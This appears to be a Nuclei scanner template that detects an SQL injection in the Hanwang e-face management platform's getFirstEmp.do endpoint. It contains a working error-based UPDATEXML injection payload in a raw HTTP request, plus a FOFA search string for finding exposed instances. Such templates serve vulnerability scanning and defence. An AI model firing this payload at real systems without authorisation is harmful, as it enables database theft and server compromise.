http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 4297f44b13955235245b2497399d7a9
            - 'XPATH syntax error:'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /manage/firstPeopleOpen/getFirstEmp.do?recoToken=67mds2pxXQb&page=1&pageSize=10&groupId=1&order=(UPDATEXML(2920,CONCAT(0x7e,MD5(123123),0x7e,(SELECT+(ELT(123=123,1)))),8357)) HTTP/1.1
          Host: {{Hostname}}
id: hanwangE-getFirstEmp_do-sql
info:
    author: Superhero
    description: |-
        fofa: icon_hash="1380907357"
        汉王e脸通综合管理平台 getFirstEmp.do 接口存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码,站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 汉王e脸通综合管理平台 getFirstEmp.do SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/7N0LqDINUbL-32-__fUH_A
    severity: high
    tags: []
